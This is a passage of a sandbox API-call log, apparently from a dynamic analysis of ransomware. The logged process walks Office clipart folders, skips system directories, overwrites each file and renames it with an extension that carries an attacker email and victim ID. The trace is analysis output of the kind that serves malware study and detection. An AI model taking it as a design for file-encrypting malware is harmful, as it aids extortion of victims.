office\\root\\clipart\\pub60cor\\na01123_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01123_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01123_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0091.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0091.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0091.596] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb70, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01126_.WMF", cAlternateFileName="")) returned 1 [0091.596] lstrcmpiW (lpString1="NA01126_.WMF", lpString2=".") returned 1 [0091.596] lstrcmpiW (lpString1="NA01126_.WMF", lpString2="..") returned 1 [0091.596] lstrcmpiW (lpString1="NA01126_.WMF", lpString2="...") returned 1 [0091.596] lstrcmpiW (lpString1="NA01126_.WMF", lpString2="windows") returned -1 [0091.596] lstrcmpiW (lpString1="NA01126_.WMF", lpString2="recovery") returned -1 [0091.596] lstrcmpiW (lpString1="NA01126_.WMF", lpString2="perflogs") returned -1 [0091.596] lstrcmpiW (lpString1="NA01126_.WMF", lpString2="documents and settings") returned 1 [0091.597] lstrcmpiW (lpString1="NA01126_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.597] lstrcmpiW (lpString1="NA01126_.WMF", lpString2="system volume information") returned -1 [0091.597] lstrcmpiW (lpString1="NA01126_.WMF", lpString2="msocache") returned 1 [0091.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0091.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01126_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01126_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01126_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0091.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0091.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01126_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01126_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01126_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0091.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0091.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0091.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0091.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01126_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01126_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.597] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2928) returned 1 [0091.597] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb70) returned 0x23fc98 [0091.598] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xb70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xb70, lpOverlapped=0x0) returned 1 [0091.600] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.600] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xb70, lpOverlapped=0x0) returned 1 [0091.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0091.600] CloseHandle (hObject=0x314) returned 1 [0091.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0091.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0091.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0091.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0091.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0091.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0091.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0091.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0091.601] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01126_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01126_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01126_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01126_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0091.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0091.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0091.602] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16a0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01130_.WMF", cAlternateFileName="")) returned 1 [0091.602] lstrcmpiW (lpString1="NA01130_.WMF", lpString2=".") returned 1 [0091.602] lstrcmpiW (lpString1="NA01130_.WMF", lpString2="..") returned 1 [0091.602] lstrcmpiW (lpString1="NA01130_.WMF", lpString2="...") returned 1 [0091.602] lstrcmpiW (lpString1="NA01130_.WMF", lpString2="windows") returned -1 [0091.602] lstrcmpiW (lpString1="NA01130_.WMF", lpString2="recovery") returned -1 [0091.602] lstrcmpiW (lpString1="NA01130_.WMF", lpString2="perflogs") returned -1 [0091.602] lstrcmpiW (lpString1="NA01130_.WMF", lpString2="documents and settings") returned 1 [0091.602] lstrcmpiW (lpString1="NA01130_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.602] lstrcmpiW (lpString1="NA01130_.WMF", lpString2="system volume information") returned -1 [0091.602] lstrcmpiW (lpString1="NA01130_.WMF", lpString2="msocache") returned 1 [0091.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0091.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01130_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01130_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01130_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0091.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0091.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01130_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01130_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01130_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0091.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0091.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0091.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0091.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01130_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.603] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5792) returned 1 [0091.603] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16a0) returned 0x205850 [0091.603] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x16a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x16a0, lpOverlapped=0x0) returned 1 [0091.651] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.651] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x16a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x16a0, lpOverlapped=0x0) returned 1 [0091.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.652] CloseHandle (hObject=0x314) returned 1 [0091.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0091.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0091.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0091.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0091.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0091.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0091.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0091.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0091.652] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01130_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01130_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01130_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0091.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0091.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0091.653] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16d8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01141_.WMF", cAlternateFileName="")) returned 1 [0091.653] lstrcmpiW (lpString1="NA01141_.WMF", lpString2=".") returned 1 [0091.653] lstrcmpiW (lpString1="NA01141_.WMF", lpString2="..") returned 1 [0091.654] lstrcmpiW (lpString1="NA01141_.WMF", lpString2="...") returned 1 [0091.654] lstrcmpiW (lpString1="NA01141_.WMF", lpString2="windows") returned -1 [0091.654] lstrcmpiW (lpString1="NA01141_.WMF", lpString2="recovery") returned -1 [0091.654] lstrcmpiW (lpString1="NA01141_.WMF", lpString2="perflogs") returned -1 [0091.654] lstrcmpiW (lpString1="NA01141_.WMF", lpString2="documents and settings") returned 1 [0091.654] lstrcmpiW (lpString1="NA01141_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.654] lstrcmpiW (lpString1="NA01141_.WMF", lpString2="system volume information") returned -1 [0091.654] lstrcmpiW (lpString1="NA01141_.WMF", lpString2="msocache") returned 1 [0091.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0091.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01141_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01141_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01141_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0091.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0091.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01141_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01141_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01141_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0091.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0091.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0091.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0091.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.655] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5848) returned 1 [0091.655] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16d0) returned 0x205850 [0091.655] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x16d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x16d0, lpOverlapped=0x0) returned 1 [0091.657] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.657] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x16d0, lpOverlapped=0x0) returned 1 [0091.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.658] CloseHandle (hObject=0x314) returned 1 [0091.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0091.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0091.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0091.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0091.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0091.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0091.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.658] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01141_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01141_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01141_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0091.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0091.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0091.659] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f38, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01148_.WMF", cAlternateFileName="")) returned 1 [0091.659] lstrcmpiW (lpString1="NA01148_.WMF", lpString2=".") returned 1 [0091.659] lstrcmpiW (lpString1="NA01148_.WMF", lpString2="..") returned 1 [0091.659] lstrcmpiW (lpString1="NA01148_.WMF", lpString2="...") returned 1 [0091.659] lstrcmpiW (lpString1="NA01148_.WMF", lpString2="windows") returned -1 [0091.659] lstrcmpiW (lpString1="NA01148_.WMF", lpString2="recovery") returned -1 [0091.659] lstrcmpiW (lpString1="NA01148_.WMF", lpString2="perflogs") returned -1 [0091.659] lstrcmpiW (lpString1="NA01148_.WMF", lpString2="documents and settings") returned 1 [0091.659] lstrcmpiW (lpString1="NA01148_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.659] lstrcmpiW (lpString1="NA01148_.WMF", lpString2="system volume information") returned -1 [0091.659] lstrcmpiW (lpString1="NA01148_.WMF", lpString2="msocache") returned 1 [0091.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 